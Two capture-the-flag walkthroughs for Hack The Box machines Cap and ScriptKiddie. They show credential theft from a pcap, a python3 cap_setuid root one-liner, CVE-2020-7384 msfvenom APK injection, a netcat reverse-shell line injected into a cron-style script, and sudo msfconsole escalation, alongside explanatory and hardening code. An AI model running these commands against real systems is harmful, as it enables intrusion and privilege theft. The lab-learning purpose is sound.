Hack The Box: Cap

Prelude

Cap was an easy machine from Hack The Box developed by InfoSecJack. This is arguably the easiest box on Hack The Box, and it is perfect for a total beginner.

Also, before the release of this machine, I was pretty sure what the privilege escalation vector would be because of the name, and I was right 😅. Getting the user and escalating privileges are both linked to the machine’s name, which I personally think is pretty cool! 😎

Let’s start the exploitation.

Exploitation

As usual, I started the exploitation with an Nmap scan.

nmap -sCV -v -oA nmap/tcp 10.10.10.245

And the result I got is as follows.

# Nmap 7.91 scan initiated Sun Jun  6 00:30:41 2021 as: /usr/bin/nmap -sCV -v -oA nmap/tcp 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.17s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Sat, 05 Jun 2021 19:00:57 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sat, 05 Jun 2021 19:00:51 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sat, 05 Jun 2021 19:00:51 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: gunicorn
|_http-title: Security Dashboard

Three ports are open: FTP (vsftpd 3.0.3), SSH and an HTTP service served by gunicorn.

The SSH banner (OpenSSH 8.2p1 Ubuntu 4ubuntu0.2) indicates that the machine is running Ubuntu 20.04 (Focal). I then tried an anonymous FTP login, but anonymous access was rejected.

Navigating to http://10.10.10.245 showed the following page.

It was a security dashboard, already logged in as the user Nathan. Sweet!

The dashboard had three functions:

  • Show IP information,
  • Show netstat information,
  • Capture packets for 5 seconds and serve the resulting .pcap file.

I tried the IP and netstat functions, but there wasn’t anything interesting there. So, I decided to capture a pcap and look for passwords.

Since FTP and HTTP are unencrypted, a capture taken while someone logs in would contain the credentials in plaintext, if the timing is right.

The pcap file can be downloaded from http://10.10.10.245/data/X, where X is the capture number.

I captured several pcap files at different times and looked at them in Wireshark, but nothing interesting was there.

Then, I decided to brute force the /data directory for leftover pcap files using ffuf, filtering out the 208-byte response that a non-existent capture ID returns (-fs 208).

ffuf -c -w  /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt  -u http://10.10.10.245/data/FUZZ -fs 208 

And got the following output.

All of the captures from 1 upwards were made by me, but 0 was not a pcap file I had generated.

So, I went to http://10.10.10.245/data/0 and downloaded the pcap file.

I then opened the pcap file in Wireshark to analyse it and found the plaintext FTP password of the user Nathan: FTP sends the USER and PASS commands unencrypted, so following the TCP stream on port 21 shows them directly.

The password for nathan was Buck3tH4TF0RM3!.
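Wireshark’s Follow TCP Stream is the quick way to read the exchange, but the same extraction is easy to script. The following is an added example (not part of the original writeup and not code from the Cap box): a dependency-free Python parser for classic .pcap files that walks Ethernet/IPv4/TCP, collects the USER/PASS commands sent to tcp/21 and pairs them per connection. The capture it parses by default is constructed inline from hand-built frames (the client address 10.10.14.3, the client port 54321 and the timestamps are assumptions); pass a real .pcap path as the first argument to run it on a file downloaded from /data/X.

```python
import re
import struct
import sys

LINKTYPE_ETHERNET = 1
FTP_CMD = re.compile(rb"^(USER|PASS) (.*?)\r?\n", re.M)


def _tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Build one Ethernet/IPv4/TCP frame (checksums left at zero; fine for parsing)."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap():
    """Constructed sample capture of an FTP login; not the box's real pcap."""
    server, client = "10.10.10.245", "10.10.14.3"
    frames = [
        _tcp_frame(server, client, 21, 54321, b"220 (vsFTPd 3.0.3)\r\n"),
        _tcp_frame(client, server, 54321, 21, b"USER nathan\r\n"),
        _tcp_frame(server, client, 21, 54321, b"331 Please specify the password.\r\n"),
        _tcp_frame(client, server, 54321, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
        _tcp_frame(server, client, 21, 54321, b"230 Login successful.\r\n"),
    ]
    # pcap global header: magic, version 2.4, tz offset, sigfigs, snaplen, link type
    pcap = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        pcap += struct.pack("<IIII", 1622920000 + i, 0, len(frame), len(frame)) + frame
    return pcap


def iter_tcp_payloads(pcap):
    """Yield (src, dst, sport, dport, payload) for every TCP segment in a classic pcap."""
    magic, = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic .pcap (pcapng is not handled here)")
    linktype, = struct.unpack(endian + "I", pcap[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only the Ethernet link type is handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4 over Ethernet, or the IP protocol is not TCP
        total_len, = struct.unpack("!H", frame[16:18])
        ip_pkt = frame[14:14 + total_len]      # drops Ethernet trailer padding
        ihl = (ip_pkt[0] & 0x0F) * 4
        tcp = ip_pkt[ihl:]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield (".".join(map(str, ip_pkt[12:16])), ".".join(map(str, ip_pkt[16:20])),
               sport, dport, tcp[data_off:])


def extract_ftp_logins(pcap):
    """Pair USER/PASS commands sent to tcp/21; returns (client, server, user, password)."""
    pending, found = {}, []
    for src, dst, sport, dport, payload in iter_tcp_payloads(pcap):
        if dport != 21 or not payload:
            continue
        for cmd, arg in FTP_CMD.findall(payload):
            key = (src, sport, dst)            # one client connection
            if cmd == b"USER":
                pending[key] = arg.decode("utf-8", "replace")
            elif cmd == b"PASS" and key in pending:
                found.append((src, dst, pending.pop(key), arg.decode("utf-8", "replace")))
    return found


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for client, server, user, password in extract_ftp_logins(data):
        print("%s -> %s  USER %s  PASS %s" % (client, server, user, password))
```

The parser deliberately rejects pcapng (the format Wireshark saves by default) rather than silently returning nothing; convert such files with editcap or tshark first. Only the client-to-server direction (dport 21) is inspected, so server banners never pollute the USER/PASS pairing.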

The same password worked for SSH, and I was in!


Privilege Escalation

Like I said before, I had a guess about where to look for privilege escalation even before the box’s release. So, I looked straight into it: Linux capabilities!

So, I searched for files with capabilities using the following command.

getcap -r / 2>/dev/null

And I got a list.

Python has the cap_setuid capability set, which lets that binary change the UID of its own process without being root. Since any user can run it, calling os.setuid(0) and then spawning a shell gives a root shell!

HackTricks has a great checklist on exploiting capabilities. I took the exploitation command from there and ran it with the python3 binary that getcap listed.

python3 -c 'import os; os.setuid(0); os.system("/bin/bash");'
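getcap works by reading the security.capability extended attribute from each file and decoding the kernel’s vfs_cap_data structure. The script below is an added example, not code from this writeup or from HackTricks: it decodes that attribute directly (revisions 1 to 3, including the v3 namespaced-root ID), renders it in getcap’s cap_name=flags form, flags the capabilities that typically mean root for anyone who can run the binary, and walks a directory tree the way getcap -r does. The two sample blobs are constructed to represent cap_setuid=ep (the Cap case) and a namespaced cap_net_admin,cap_net_raw=eip; the DANGEROUS set is a triage judgement, not an exhaustive list.

```python
import os
import struct
import sys

# Capability bit numbers from include/uapi/linux/capability.h.
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]
# File caps that hand a local user root (or root-equivalent file access) when
# set on an arbitrary binary; the first things to look at in a getcap listing.
DANGEROUS = {"setuid", "setgid", "setfcap", "sys_admin", "sys_ptrace", "sys_module",
             "dac_override", "dac_read_search", "chown", "fowner", "sys_rawio"}

VFS_CAP_FLAGS_EFFECTIVE = 0x000001   # in magic_etc: every permitted cap is also effective

# Constructed xattr blobs (assumed, not read from the Cap box):
# revision 2, permitted = {setuid}, effective flag set  ->  "cap_setuid=ep"
SAMPLE_SETUID_EP = bytes.fromhex("01000002" "80000000" "00000000" "00000000" "00000000")
# revision 3, permitted = inheritable = {net_admin, net_raw}, effective, rootid 1000
SAMPLE_NET_EIP_NS = bytes.fromhex("01000003" "00300000" "00300000"
                                  "00000000" "00000000" "e8030000")


def _bit_names(mask):
    return [CAP_NAMES[b] if b < len(CAP_NAMES) else str(b)
            for b in range(64) if mask >> b & 1]


def decode_vfs_caps(blob):
    """Decode a security.capability xattr (struct vfs_cap_data, little-endian)."""
    if len(blob) < 4:
        raise ValueError("xattr too short")
    magic_etc, = struct.unpack_from("<I", blob, 0)
    revision = magic_etc >> 24
    if revision not in (1, 2, 3):
        raise ValueError("unknown vfs_cap_data revision %#x" % revision)
    words = 1 if revision == 1 else 2          # revision 1 carries only 32 capability bits
    permitted = inheritable = 0
    for i in range(words):
        p, inh = struct.unpack_from("<II", blob, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    rootid = struct.unpack_from("<I", blob, 4 + 8 * words)[0] if revision == 3 else 0
    return {
        "revision": revision,
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": _bit_names(permitted),
        "inheritable": _bit_names(inheritable),
        "rootid": rootid,                      # v3: non-zero means caps only for that user-ns root
    }


def render(caps):
    """Format like getcap: cap_a,cap_b=flags, grouping caps that share the same flags."""
    groups = {}
    for name in dict.fromkeys(caps["permitted"] + caps["inheritable"]):
        perm = name in caps["permitted"]
        flags = ("e" if perm and caps["effective"] else "") + \
                ("i" if name in caps["inheritable"] else "") + ("p" if perm else "")
        groups.setdefault(flags, []).append(name)
    return " ".join(",".join("cap_" + n for n in names) + "=" + flags
                    for flags, names in groups.items())


def dangerous(caps):
    """Permitted caps from DANGEROUS (inheritable-only caps need an exec chain to matter)."""
    return [n for n in caps["permitted"] if n in DANGEROUS]


def scan(root="/", skip=("/proc", "/sys", "/dev", "/run")):
    """What `getcap -r` does: read the xattr of every file under *root* (Linux only)."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:
                continue  # ENODATA (no caps), EACCES, ENOTSUP on this fs, dangling link
            yield path, decode_vfs_caps(blob)


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # e.g. python3 capscan.py /usr/bin
        for path, caps in scan(sys.argv[1]):
            print("%s %s  %s" % ("!!" if dangerous(caps) else "  ", path, render(caps)))
    else:
        for blob in (SAMPLE_SETUID_EP, SAMPLE_NET_EIP_NS):
            caps = decode_vfs_caps(blob)
            print(render(caps), "dangerous:", dangerous(caps), "rootid:", caps["rootid"])
```

One caveat worth remembering when a listed capability refuses to work: the kernel ignores file capabilities on filesystems mounted nosuid, and a v3 blob with a non-zero rootid only grants the caps inside the user namespace whose root has that UID.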

And I am w00t!

Postlude

And that was Cap!

This was an easy but fun box and I really enjoyed every aspect of this box.

Kudos to InfoSecJack for this awesome box!

Peace out! ✌️

Hack The Box: ScriptKiddie

Prelude

ScriptKiddie was an easy machine from Hack The Box, developed by the CTF addict 0xdf.

Even though this was an easy box, there were some rabbit holes and quirks that inexperienced people will fall for. I know this because I fell for them face down.

Hard! 😅

But, overall this was a good machine and taught me a little bit more about some rabbit holes to avoid.

Let’s start the exploitation.

Exploitation

As usual, I started the exploitation with an Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.226

And the result I got is as follows.

# Nmap 7.91 scan initiated Fri May 14 13:26:06 2021 as: /usr/bin/nmap -sCV -v -oN tcp 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two ports are open: SSH and a Werkzeug (Python) HTTP service on port 5000.

The SSH banner (OpenSSH 8.2p1 Ubuntu 4ubuntu0.1) indicates that the machine is running Ubuntu 20.04 (Focal).

After identifying the target OS, I proceeded to enumerate port 5000.

Navigating to http://10.10.10.226:5000 showed the following page.

This was a web front end built by a script kiddie, with three functions:

  • Scan the Nmap top 100 ports,
  • Generate Windows, Linux and Android payloads using msfvenom,
  • Search for exploits with searchsploit.

Diving Nose Down into a Rabbit Hole


Since this was an easy box, my first plan was to check for command injection. So, I started testing for command injection, and it was a rabbit hole.

All the inputs sent to the tools were properly validated and threw different errors when presented with bad input.

When a bad input was sent to the searchsploit tool via the website, the page threw the following error.

stop hacking me- we’ll hack you back

This was a clue foreshadowing the lateral move to another user we have to make later, and a clue that I was going down a rabbit hole! 😅

I spent way too much time in this rabbit hole before realizing my mistake.

I didn’t focus on the error message because this web page had variable response times: sometimes it returned within 200 ms and sometimes it took more than 400 ms.

So, when I was testing for command injection in the searchsploit field, I noticed the varied response times and mistook them for a sign of a successful (blind) command injection.

I sent different reverse shell payloads to the searchsploit tool and got this output on my netcat listener.

I was getting a SYN packet followed by a RST packet.

I didn’t understand this behaviour, thought it might be due to some WAF rule in place, and wasted hours troubleshooting the issue.

It was only later that I realised this was an automated Nmap SYN (stealth) scan from the box hitting my listener, and not an indication of command injection! A SYN scan never completes the handshake: the scanner sends SYN, my listener answers SYN/ACK, and the scanning host tears the half-open connection down with RST.

Stupid me!

Intended way of gaining User Shell

The intended way of getting the user shell is to exploit a command injection vulnerability in msfvenom’s APK template handling in Metasploit Framework 6.0.11 and earlier (CVE-2020-7384): a crafted value in the signing certificate of an attacker-supplied APK template is passed to a shell command without escaping.

I modified the command variable in the exploit script to a netcat reverse shell that does not rely on the -e option.

Then I ran the script, and it generated the malicious evil.apk file at /tmp/tmpsfby41gg/evil.apk.

I uploaded evil.apk to the website as an Android template.

And I got a shell back!

We can also use the Metasploit module exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection to generate the APK.

Privilege Escalation

Privilege escalation was a two-step process, which was relatively simple. However, due to some issues, the first step took more time than I would’ve liked.

We first get a shell as the user kid. But I quickly realised that the kid user can read the contents of the user pwn’s home folder.

Inside pwn’s home folder is a script named scanlosers.sh, which is responsible for the automated Nmap scan we discussed earlier.

The script is rather short and the contents are as shown below.

#!/bin/bash

log="hackers"

cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    echo $ip
    sudo sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

So, what the script does is read the file /home/kid/logs/hackers, extract everything from the third space-separated field onward (cut -d' ' -f3-), treat it as an IP address and pass it to nmap through sudo sh -c, once per unique value.

Let’s check the permissions of /home/kid/logs/hackers.

Both kid and pwn have read/write access to the file hackers. Since the script does no input validation and interpolates the field straight into a sh -c string, we can use this vector to execute commands as pwn.

This is where I was stuck for quite some time since, for some reason, my regular reverse shell payloads weren’t working at all.

I tried msfvenom payloads, PayloadsAllTheThings payloads and even compiled a reverse shell binary in C.

However, none of them worked for some reason. Most of them didn’t work, and the ones that worked only gave me a partial shell with the following error.

Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:47312.
bash: cannot set terminal process group (863): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ exit

I believe that sometimes the incron service that detects changes to /home/kid/logs/hackers gets messed up. At that point, even writing the correct payload to the hackers file won’t work unless the service is restarted or the machine is reset.

Also, if the kid user removes the hackers file, the file permissions will be reset and the pwn user won’t be able to read the file. If that happens, we have to reset the machine to restore the file permissions.

Due to these behaviours of the machine, I was stuck at this point for quite some time.

Along with this weirdness, the target’s netcat binary didn’t support the -e option. So, I decided to upload a static nc binary with -e to the target.

But when I tried to execute the binary as pwn, for some reason, executing the static nc from the /tmp directory didn’t work (most probably because /tmp is mounted noexec). So, I copied the static binary to /dev/shm and used the following command, run from /home/kid/logs, to execute netcat as the pwn user. Here ncx64 is the static netcat binary.

echo "    ;/dev/shm/ncx64 -e sh 10.10.16.12 9001 " > hackers

The spaces at the beginning are padding: cut -d' ' -f3- splits on every single space, so each leading space produces an empty field, and at least two of them are needed for the whole payload to land in field 3 onward. With fewer, the start of the payload is cut off. The ; terminates the nmap command that the script builds in front of our input, so the shell runs our command next.
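To see exactly why the padding matters, the following added example (not the box’s code and not part of the original writeup) re-implements the cut -d' ' -f3- | sort -u | while read ip pipeline and the sh -c string that scanlosers.sh builds from it, then shows the fix: validate the field with ipaddress and pass an argv list to subprocess so no shell ever sees the value. The three hackers lines are constructed; the real application’s line format is not shown on this page, only that the IP is the third space-separated field. A harmless id > /tmp/pwned stands in for the reverse shell.

```python
import ipaddress
import subprocess

NMAP_TEMPLATE = "nmap --top-ports 10 -oN recon/%s.nmap %s 2>&1 >/dev/null"

# Constructed sample lines for /home/kid/logs/hackers (the bracketed timestamp is
# an assumption; the pipeline only cares that the IP is the third field).
LEGIT_LINE = "[2021-05-14 13:26:06] 10.10.14.3\n"
ONE_SPACE = " ;id > /tmp/pwned\n"
TWO_SPACES = "  ;id > /tmp/pwned\n"


def cut_fields_from_3(line):
    """Emulate `cut -d' ' -f3-`: split on every single space, keep field 3 onward."""
    return " ".join(line.rstrip("\n").split(" ")[2:])


def shell_read(word):
    """Emulate `read ip` with the default IFS: leading/trailing blanks are stripped."""
    return word.strip(" \t")


def extracted_ips(log_text):
    """The values `while read ip` receives (sort -u semantics; blank lines ignored)."""
    return sorted({shell_read(cut_fields_from_3(l))
                   for l in log_text.splitlines() if l.strip()})


def scanlosers_commands(log_text):
    """The exact strings scanlosers.sh hands to `sudo sh -c` (the vulnerable behaviour)."""
    return [NMAP_TEMPLATE % (ip, ip) for ip in extracted_ips(log_text)]


def hardened_argv(log_text):
    """Fix: accept only a parseable IP address and build argv for subprocess, no shell."""
    argvs = []
    for ip in extracted_ips(log_text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue        # anything that is not an address is dropped, never interpolated
        argvs.append(["nmap", "--top-ports", "10", "-oN", "recon/%s.nmap" % addr, str(addr)])
    return argvs


def run_hardened(log_text):
    """Run the validated scans without a shell: ';' in a list argument is just data."""
    return [subprocess.run(argv, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT,
                           check=False).returncode
            for argv in hardened_argv(log_text)]


if __name__ == "__main__":
    for label, line in (("legit", LEGIT_LINE), ("1 space", ONE_SPACE), ("2 spaces", TWO_SPACES)):
        print("%-9s read ip  -> %r" % (label, extracted_ips(line)))
        print("%-9s sh -c    -> %r" % ("", scanlosers_commands(line)[0]))
        print("%-9s hardened -> %r" % ("", hardened_argv(line)))
```

With one leading space the payload’s first word becomes field 2 and is discarded, so only > /tmp/pwned survives; with two it is field 3 and the whole line is spliced into the sh -c string, where the ; ends the nmap invocation. The hardened variant never reaches a shell at all, which is the property to check for in any script that builds commands from a file other users can write.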

And I got a shell back!


One last ride.. I mean Privesc!

Now I was logged in as the pwn user. Running sudo -l showed the following output.

We can run msfconsole as root. So, I issued the following command to run msfconsole as root.

sudo -u root /opt/metasploit-framework-6.0.9/msfconsole

Inside msfconsole, I entered bash: msfconsole passes commands it does not recognise to the operating system shell, so this dropped me into a bash shell running as root.

Aannnnd W00t!

We’re root!

Postlude

This was a great machine and a frustrating yet rewarding experience for me! Even though it is a fairly straightforward machine, the overall weirdness of the box made it difficult to exploit, but it was nevertheless a good experience.

Kudos to 0xdf for creating such an awesome box!